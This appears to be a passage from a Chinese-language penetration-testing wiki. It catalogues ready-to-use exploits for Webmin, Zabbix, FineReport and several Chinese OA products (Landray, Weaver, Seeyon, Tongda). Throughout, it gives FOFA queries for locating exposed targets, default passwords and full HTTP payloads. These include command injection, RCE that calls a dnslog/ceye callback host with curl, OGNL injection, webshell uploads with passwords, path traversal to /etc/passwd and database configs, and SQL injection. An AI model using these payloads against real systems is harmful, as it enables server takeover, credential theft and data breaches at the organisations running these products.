    Referer: https://x.x.x.x/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Content-Length: 491
    
    {
        "filters": [
            {
                "id": "sample",
                "filters": [
                    {
                        "condition": {
                            "parameterValues": {
                                "": "script::Runtime r = Runtime.getRuntime(); r.exec('ping 1.dnslog.cn');"
                            },
                            "type": "profilePropertyCondition"
                        }
                    }
                ]
            }
        ],
        "sessionId": "sample"
    }
    

Webmin

官网 : http://www.webmin.com/

搭建教程

CVE-2019-12840

CVE-2019-15107 Webmin Remote Code Execution

  • 描述

    在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令.

  • 影响版本

    • Webmin < 1.920
  • 相关文章

  • POC | Payload | exp

    POST /password_change.cgi HTTP/1.1
    Host: your-ip:10000
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: redirect=1; testing=1; sid=x; sessiontest=1
    Referer: https://your-ip:10000/session_login.cgi
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 60
    
    user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
    

CVE-2019-15642 Webmin Remote Code Execution

  • 描述

    Webmin 到 1.920 中的 rpc.cgi 允许通过精心设计的对象名称进行经过身份验证的远程代码执行,因为 unserialise_variable 进行了 eval 调用。注意:Webmin_Servers_Index 文档指出“ RPC 可用于运行任何命令或修改服务器上的任何文件,这就是为什么不得将它的访问权限授予不可信的 Webmin 用户的原因。”

  • 影响版本

    • Webmin < 1.920
  • POC | Payload | exp

CVE-2020-35606

  • POC | Payload | exp
    /package-updates/update.cgi
    
    application/x-www-form-urlencoded
    
    redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26
    

XXL-job

fofa: app="XXL-JOB"

RESTful API 未授权访问RCE


zabbix

官网 : https://www.zabbix.com
fofa: app="ZABBIX-监控系统"

zabbix 是一款服务器监控软件,其由 server、agent、web 等模块组成,其中 web 模块由 PHP 编写,用来显示数据库中的结果.

搭建教程

CVE-2016-10134 zabbix latest.php SQL 注入漏洞

CVE-2020-11800 zabbix RCE

CVE-2021-27927

CVE-2022-23131

CVE-2022-23134


Zimbra

相关文章


Zoho-ManageEngine

CVE-2020-28653

任意文件上传

CVE-2021-40539

CVE-2021-41081

CVE-2021-44077

CVE-2021-44515

CVE-2022-28219

CVE-2022-29081


宝塔

fofa: app="宝塔-Linux控制面板"

相关资源

宝塔面板 phpMyadmin 未授权访问

  • POC | Payload | exp
    xxx.xxx.xxx.xxx:888/pma
    

宝塔 <6.0 存储形xss


禅道

fofa: app="易软天创-禅道系统"

CNVD-2020-65242 后台任意文件下载

  • POC | Payload | exp
    index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=/etc/passwd&type=file
    index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=./../../config/my.php&type=file
    

后台 im 模块 downloadXxdPackage 函数任意文件下载

  • POC | Payload | exp
    index.php?m=im&f=downloadXxdPackage&xxdFileName=../../../../../../../../../etc/passwd
    

12.4.2后台管理员权限Getshell


帆软

fofa: app="帆软-FineReport"
fofa: body="/WebReport/ReportServer"
fofa: body="isSupportForgetPwd"

帆软报表目录遍历

  • POC | Payload | exp
    /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
    

CNVD-2018-04757 帆软报表 v8.0 任意文件读取漏洞

帆软 V9 任意文件覆盖getshell

  • 相关文章

  • POC | Payload | exp

    POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp  HTTP/1.1
    Host: 192.168.10.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE
    Connection: close
    Content-Type:text/xml;charset=UTF-8
    
    Content-Length: 74
    
    {"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}
    

帆软报表 FineRePort 未授权远程命令执行漏洞

  • 影响版本

    • 帆软报表 FineRePortv8.0
    • 帆软报表 FineRePortv9.0
  • POC | Payload | exp

    xxx.com/WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin
    
    这个接口 打开 点查询 burp 拦截数据包 替换 post 的内容
    
    __parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl http://xxxx.ceye.io');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}
    
    POST /WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
    Connection: close
    Content-Length: 675
    
    __parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl http://xxxx.dnslog.cn');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}
    

OA

本类包含 OA、ERP、CRM 等

蓝凌

FOFA: app="Landray-OA系统"

相关工具

蓝凌OA custom.jsp 任意文件读取漏洞

  • 相关文章

  • POC | Payload | exp

    POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
    Host:
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    Content-Length: 42
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
    
    var={"body":{"file":"file:///etc/passwd"}}
    

蓝凌 OA SSRF+JNDI 远程命令执行

  • POC | Payload | exp
    配合文件读漏洞 读取 /WEB-INF/KmssConfig/admin.properties
    获取password后,使用 DES方法 解密,默认密钥为 kmssAdminKey
    
    访问后台地址使用解密的密码登录
    http://xxx.xxx.xxx.xxx/admin.do
    
    使用JNDI-Injection-Exploit 执行 getshell
    

CNVD-2021-01363-蓝凌 OA-EKP 后台 SQL 注入漏洞

  • 描述

    ordeby 参数存在注入

  • POC | Payload | exp

    /km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true
    

蓝凌 OA xmldecoder 反序列化

蓝凌 OA treexml.tmpl script 远程代码执行漏洞


泛微

官网 : https://www.weaver.com.cn/

相关文章

相关工具

敏感文件泄露

  • /messager/users.data
  • /plugin/ewe/jsp/config.jsp

路径遍历

  • /plugin/ewe/admin/upload.jsp?id=11&dir=../../../
  • /weaver/weaver.file.SignatureDownLoad?markId=1+union+select+'../ecology/WEB-INF/prop/weaver.properties'

e-mobile

fofa: app="泛微-EMobile"

E-mobile

admin/admin111

E-Mobile 4.5 RCE

**.**.**.**/verifyLogin.do
data:loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@**.**.**.**.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}

http://**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**:89/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

CNVD-2017-03561 e-mobile < 6.5 Ognl 表达式注入

CNVD-2017-07285 S2-046

  • POC | Payload | exp
    filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    

CNVD-2021-25287 SQLi to RCE

e-cology

fofa: app="Weaver-OA"
fofa: app="泛微-协同办公 OA"

指纹

  • Set-Cookie: ecology_JSessionId=
  • ecology

OA 默认口令

sysadmin/1

/services/MobileService?wsdl 注入

泛微OA sysinterface/codeEdit.jsp 页面任意文件上传 WooYun-2015-0155705

e-cology OA Beanshell 组件远程代码执行

ecology8_mobile_sql_inject

泛微 OA WorkflowCenterTreeData 接口注入漏洞(限 oracle 数据库)

泛微 ecology OA 系统接口存在数据库配置信息泄露漏洞

泛微OA V8 SQL注入漏洞

  • 描述

    泛微 OA V8 存在 SQL 注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限

  • POC | Payload | exp

    /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
    

泛微OA V9前台上传漏洞

  • 描述

    泛微 OA V9 存在文件上传接口导致任意文件上传, 漏洞位于: /page/exportImport/uploadOperation.jsp 文件中

  • POC | Payload | exp

    POST /page/exportImport/uploadOperation.jsp HTTP/1.1
    Host: x.x.x.x
    Content-Length: 216
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://x.x.x.x/
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
    Connection: close
    
    ------WebKitFormBoundaryFy3iNVBftjP6IOwo
    Content-Disposition: form-data; name="file"; filename="12.jsp"
    Content-Type: application/octet-stream
    
    <%out.print(1111);%>
    ------WebKitFormBoundaryFy3iNVBftjP6IOwo--
    
    page/exportImport/fileTransfer/12.jsp
    

泛微OA V9 E-Cology WorkflowServiceXml RCE

泛微OA weaver.common.Ctrl 任意文件上传漏洞

com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction 任意文件上传

weaver.workflow.exceldesign.ExcelUploadServlet 任意文件上传

/workrelate/plan/util/uploaderOperate.jsp + /OfficeServer 文件上传

管理员任意登录

  • POC | Payload | exp
    /mobile/plugin/VerifyQuickLogin.jsp
    
    identifier=1&language=1&ipaddress=
    

e-bridge

fofa: app="泛微-云桥 e-Bridge"

泛微云桥 /wxjsapi/saveYZJFile 任意文件读取

  • 描述

    未授权任意文件读取,/wxjsapi/saveYZJFile 接口获取 filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。

  • 相关文章

  • POC | Payload | exp

    downloadUrl 参数修改成需要获取文件的绝对路径,记录返回包中的 id 值
    /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c:windows/win.ini&fileExt=txt
    

    通过查看文件接口访问 /file/fileNoLogin/id

    /file/fileNoLogin/xxxxxxxxxxxxxxxxx
    

    参考安识科技 A-Team 利用方法,https://mp.weixin.qq.com/s/Y_2_e7HIWH3z5jhMsK7pZA

    参数不填写绝对路径写进文本内容就是当前的目录,产生了一个新的漏洞 “目录遍历”
    /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt
    
    常见路径
    d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.properties
    d:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA数据库
    

e-office

fofa: app="泛微-EOffice"

指纹

  • /general/login/index.php

相关文章

CNVD-2021-49104 E-Office v9 任意文件上传漏洞

E-office do_excel.php任意文件写入漏洞

  • POC | Payload | exp
    /WWW/general/charge/charge_list/do_excel.php
    
    html=<?php system($_POST[pass]);?>
    

eoffice10 前台 getshell

  • POC | Payload | exp

    查看版本 /eoffice10/version.json

    <form method='post'
    action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
    enctype="multipart/form-data" >
    <input type="file" name="FileData"/></br></br>
    <input type="text" name="FormData" value="1"/></br></br>
    <button type=submit value="上传">上传</button> </form>
    
    POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
    Host: XXXXXXXX:8010
    Content-Length: 378
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/91.0.4472.77 Safari/537.36
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
    *;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
    Connection: close
    ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
    Content-Disposition: form-data; name="FileData"; filename="1.jpg"
    Content-Type: image/jpeg
    <?php echo md5(1);?>
    ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
    Content-Disposition: form-data; name="FormData"
    {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
    ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
    

    http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

任意文件上传

  • POC | Payload | exp
    /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save
    
    后缀 xxx.php.
    
    /attachment/xxxxx.php
    

全回显SSRF可RCE

  • POC | Payload | exp
    /E-mobile/App/Ajax/ajax.php?action=dingtalkImg&result[]=http://x.x.x.x/1.php
    
    /attachment/xxxxx.php
    

回显SSRF

  • POC | Payload | exp
    /E-mobile/App/System/File/downfile.php?url=
    Host: www.baidu.com
    

致远

官网 : http://www.seeyon.com/

Fofa : app="致远互联-OA"

相关文章

相关工具

致远OA数据库配置文件

/opt/Seeyon/A8/base/conf/datasourceCtp.properties

指纹

  • /seeyon/htmlofficeservlet
  • /seeyon/index.jsp
  • seeyon

默认口令

system/system
group-admin/123456
admin1/123456
gov-admin/123456
audit-admin/123456

致远OA Session泄漏漏洞

需登录账户,注入发生在search_result.jsp文件中的docTitle参数

  • POC | Payload | exp
    /yyoa/ext/https/getSessionList.jsp?cmd=getAll
    

致远OA A6 search_result.jsp sql注入漏洞

  • POC | Payload | exp
    /yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=1'and/**/1=2/**/ union/**/all/**/select/**/user(),2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc
    

致远OA A6 setextno.jsp sql注入漏洞

  • POC | Payload | exp
    /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,@@version,user()%23
    

致远OA A6 重置数据库账号密码漏洞

  • POC | Payload | exp
    /yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23{'success':false,'errors':'root@localhost'}
    

致远OA A6 敏感信息泄露

  • POC | Payload | exp
    /yyoa/createMysql.jsp
    /yyoa/ext/createMysql.jsp
    /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
    

致远 OA A6 test.jsp sql 注入漏洞

致远OA A8 未授权访问

  • POC | Payload | exp
    /seeyon/main.do?method=officeDown&filename=c:/boot.ini
    

致远OA A8 任意用户密码修改漏洞

致远OA A8-m 后台万能密码

  • POC | Payload | exp
    www.test.com/seeyon/management/status.jsp
    WLCCYBD@SEEYON
    

致远OA A8-v5 无视验证码撞库

  • 描述

    致远 A8-V5 在设计时存在逻辑错误,用户修改密码时对原密码进行了验证,但是验证使用的服务存在未授权访问漏洞,系统对非合法请求的原密码验证功能进行回应,导致了无视验证码,无需 login 页面进行密码尝试

  • POC | Payload | exp

    GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=admin&P_2_String=wy123456 HTTP/1.0
    Accept: */*
    Accept-Language: zh-cn
    Referer: http://www.test.com/seeyon/individualManager.do?method=managerFrame
    requesttype: AJAX
    Content-Type: application/x-www-form-urlencoded
    Cookie: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: www.test.com
    DNT: 1
    Proxy-Connection: Keep-Alive
    

致远OA A8-v5 任意用户密码修改

  • 描述

    致远 A8-V5 在设计时存在逻辑错误,在上一步对原始密码进行验证后,下一步不再检测原始密码,从而直接修改用户密码,导致平行权限的越权漏洞。

  • POC | Payload | exp

    POST /seeyon/individualManager.do?method=modifyIndividual HTTP/1.0
    Accept: text/html, application/xhtml+xml, */*
    Referer: http://www.test.com/seeyon/individualManager.do?method=managerFrame
    Accept-Language: zh-CN
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Proxy-Connection: Keep-Alive
    Pragma: no-cache
    Content-Length: 86
    DNT: 1
    Host: www.test.com
    Cookie: JSESSIONID=DA71A65B3AAD45823A1FADAB80A3E685; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849,1419232608; avatarImageUrl=8469117046183055270; loginPageURL="/main.do"
    
    individualName=admin&formerpassword=123456&nowpassword=wy123456&validatepass=wy123456
    

    individualName为用户名

    注意,此处需要以一个合法的JSESSIONID发送如上数据即可修改任意用户密码,合法的JSESSIONID由撞库得出。

致远OA帆软报表组件反射型XSS&SSRF

致远 OA 帆软报表组件前台 XXE 漏洞

A8-OA-seeyon-RCE

CNVD-2020-62422 webmail.do任意文件下载

  • 影响版本

    • 致远OA A6-V5
    • 致远OA A8-V5
    • 致远OA G6
  • POC | Payload | exp

    http://xxx.xxx.xxx.xxx/seeyon/webmail.do?method=doDownloadAtt&filename=a.txt&filePath=../conf/datasourceCtp.properties
    

致远OA任意管理员登陆

CNVD-2021-01627 && 致远 OA ajax.do 登录绕过任意文件上传

  • 相关文章

  • POC | Payload | exp

    POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
    Host: 127.0.0.1
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=7B6D8C106BD599DB0EF2F2E3B794A4FA; loginPageURL=; login_locale=zh_CN;
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 8819
    
    managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BCA%3FL%C2%93%C2%B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2%95%C2%96A%C3%A6%C2%8A%C3%82mKj%19%C2%8B%C2%9C%C2%A5%C3%8A%C2%82Y%5C%C2%AC%C2%B9%24%C2%80d%C2%9E%03%5E%C3%8F%C3%97D%29%5Cm%2C%1F%07%2F%C3%85Q%5CD%C2%B6%26%C3%B9%C2%90%C3%A8%15%C3%A0p%C3%A1%C2%86%2C%C3%9Ah%C3%83J%0A%C2%87%C3%8FN%C2%A4%5C%C2%B7DM%00%C3%91C%28b%C3%8E%C3%96%C2%84%C2%ABe%40%2C%C2%898%03%C3%A2%C2%B8%C2%825%3EYp%C2%96%26%0C%C3%A8%7B%C2%BAFq%C3%9A%C3%B0%C2%A6%C2%9F%5B%C3%BCJ%00K%C2%B5%C3%B8TFqmc%C2%93%C3%8BH*va%C3%B9%0F%C3%A0_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3%24*%C2%A9e*7iq%C3%B4m3%60mC8%C2%83j2%C2%A3%3A7%C3%80%C2%96%C2%85e%C2%A8%18D%C2%99.%C3%8F%5B%C2%BD%C2%838%0E%28F%25%C2%89%C2%9B%C3%84%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%95%3A%C3%86%C3%86%C3%9Fse%00%C3%B8%C2%8DoW%01%C3%B2L%15K%C2%8B%0CZ%08%C2%8Fh%7C%2C4W%C2%B9%C2%B4l%C3%AD%C3%96D%C3%856%C3%81%C2%B9%7Dl%C2%B1eQJ7%C3%93%12%C2%ADI%C2%89%5D%02Ygz%1E%C2%9DL%C3%B6%C2%99%C3%A6%C2%B4%C3%8E%C3%BB%C3%996j%C2%BDU%40s%40%C3%B3w%C3%8F%5B%C2%A4%C2%84%C2%80%C3%A0%2B%14K%0Cg%C3%82%01.W%C2%89K%C2%80%C3%AF%C3%9CXd%1F%C3%B6%03%C3%BB%C2%B0%C2%A9%C2%B6%C2%86%C2%8D%C2%ADP%3Fo%0F%C3%92%C3%80B%C3%92%08p%C3%BA%C2%AD%C2%A9%01%12%C2%AE%C3%90T%0D%C3%8B%28%07%C2%B6%C3%A6%23%C2%A8I%C2%A9S%C2%9DG%7B%0E_%C2%9D6%C3%86%C3%B1%1B%C2%BD%26%10%C3%839%C2%A6uU%03%C2%97%28X%C2%9E%C2%AE%26%C2%AA%C2%BEA%C3%B2%21%0B%C3%974%06%C3%87%C3%9C%C3%87%1BT%C3%A6%C2%B6%09%C3%BC%23%C2%A7%C2%87u%C2%AC%1A%C2%A7%0BG%7E%C2%82%C2%AD%C3%8A%C2%8F%3F%C3%BC%19%C3%99%C2%BF%C3%BE%C2%99%C3%88%C2%95%C2%84d%C2%AD%C2%91O%C3%AB%7C%C2%81%C3%8AO%C3%96o%C3%B8%C3%9Ay%C3%A4%12%C2%9D%C2%A7%C3%B5%C2%89%C2%A1%18%24%C2%A0j%C3%B4%C3%9A%C3%BA%C3%94z%C2%8D_%C2%BF%C3%96F%C2%9E%C2%9E%C2%A9%1C%C3%84V%25%C2%9C%5D%C3%96%C2%A6%C3%B9X%C2%A4%C2%B2%28%60XMn%C3%90%18%C3%A6%C2%AE%C2%81o%C3%B4m%C2%BA%C3%97%C2%95%C2%85%12%C2%AAs%C2%9A%C3%97%C3%A2n%C2%977%C3%BD%C3%81%C2%A9x%1F%C3%A9%C3%84%C2%A6%C2%BD*%2FW%18%C2%98%3A%06%C3%BC%3E%C2%B79%C2%9D%3D%12%C3%BD%C3%AD%C2%8F%1C%C3%944%C2%9D%5E%C2%97%1Cc%C3%AAgBc%C2%A0%C3%B1%C3%83%C2%95%1B%29%C2%ACe%08%21%C2%8D%C2%8F%C3%BA%C2%A1%C2%97%C3%90X%C2%A4%C2%A0%0A%C2%9A%C2%9E%C3%9Es%C3%A3%1C%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7T%C2%8E9a%5DQgw%C3%A1%C2%B5h%C3%AB%C2%BA*%5C%7E%C3%BF%C3%B8%3E%C3%ADL%C2%9AG%7D%C2%82R%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07bH%07%1E%C3%9E%C3%AFv%C3%96%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFI%7E%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87%7D%C3%93o%18%1C%C3%B5%3E%C2%82%C3%BF%C2%9F.%C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2%BCv%7F%C3%90%25I%17%C3%A5k%7Dg%C2%97%C3%9C%C3%AB%C3%BE%C3%BD%2FheA%C3%A4_%05%00%00
    
    Webshell地址:https://xxxxx/seeyon/SeeyonUpdate1.jspx
    冰蝎3 默认马pass:rebeyond
    

A5-V8 致远OA任意文件下载漏洞

致远OA fastjson远程代码执行漏洞


通达

官网 : https://www.tongda2000.com/
fofa: app="TDXK-通达OA"

指纹

  • tongda.ico
  • Office Anywhere 20xx版 网络智能办公系统
  • /ispirit/interface/gateway.php
  • /mac/gateway.php

相关文章

相关工具

通达oa 2007 sql注入漏洞

  • POC | Payload | exp
    /general/document/index.php/setting/keywords/index
    
    _SERVER[QUERY_STRING]=kname=1%2Band@``%2Bor%2Bif(substr(user(),1,4)=root,1,exp(710))#
    

通达oa 2011-2013 GETSHELL

  • POC | Payload | exp
    /general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
    
    /general/email/index.php
    
    /general/email/shell.php 密码C
    

2013、2015版本 文件包含

  • POC | Payload | exp

    www.test.com/inc/menu_left.php?GLOBALS[MENU_LEFT][A][module][1]=a&include_file=../inc/js/menu_left.js
    

    头像常见路径: \MYOA\webroot\attachment\avatar\XXX.jpg

2013、2015版本 SQL 注入

  • POC | Payload | exp
    www.test.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random
    
    POST /general/document/index.php/recv/register/turn HTTP/1.1
    
    _SERVER=&rid=1'
    
    _SERVER=&rid=exp(if((1=1),1,710))
    
    POST /general/document/index.php/recv/register/insert HTTP/1.1
    
    title)values("'"^exp(if(1%3d2,1,710)))#=1&_SERVER=
    

2013、2015版本 未授权访问

  • POC | Payload | exp
    www.test.com/mobile/inc/get_contactlist.php?P=1&KWORD=%&isuser_info=3
    www.test.com/mobile/user_info/data.php?P=1&ATYPE=getUserInfo&Q_ID=50
    

2013、2015版本 敏感信息泄露

  • POC | Payload | exp
    www.test.com/general/get_userinfo.php
    www.test.com/general/ipanel/user/query.php
    www.test.com/general/info/dept/
    

2013、2015版本 XSS

  • POC | Payload | exp

    发送邮件、问题问答存在 XSS

    <img src=x onerror=alert(1)>
    

2013、2015版本 越权

  • POC | Payload | exp

    www.test.com/interface/ugo.php?OA_USER=admin
    
    www.test.com/general/system/database/
    GET 转为 POST 加上参数 _SERVER=
    

2013、2015版本 任意⽂件上传漏洞

  • POC | Payload | exp

    <form enctype="multipart/form-data" action="http://www.test.com/general/vmeet/wbUpload.php?fileName=test.php+" method="post">
    <input type="file" name="Filedata" size="50"><br>
    <input type="submit" value="Upload">
    </form>
    

